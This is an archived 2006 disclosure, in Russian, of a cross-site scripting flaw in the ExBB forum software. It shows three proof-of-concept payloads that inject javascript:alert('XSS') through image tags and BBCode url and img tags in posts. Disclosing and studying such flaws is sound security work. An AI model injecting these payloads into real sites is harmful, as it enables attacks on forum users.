Lucene search
SecurityvulnsSECURITYVULNS:DOC:12487HistoryMay 01, 2006 - 12:00 a.m.
FW: ExBB <=1.1 XSS vuln.
2006-05-0100:00:00
vulners.com
13
Извиняюсь ExBB <=1.9.1 XSS vuln.
From: KeVRter [mailto:[email protected]]
Sent: Monday, May 01, 2006 7:53 PM
To: ' ([email protected])'
Subject: ExBB <=1.1 XSS vuln.
Cross Site Scripting
При добавлении сообщения/темы/голосования осуществляется не достаточная
фильтрация входных данных:
Примеры: XSS<image/src=javascript:alert('XSS')>
[url=http://ya.ru:>XSS</a><image/src=javascript:alert('XSS')><a][/url]
[img]XSS<image/src=javascript:alert('XSS')>[/img]
Email: [email protected]
ICQ: 294308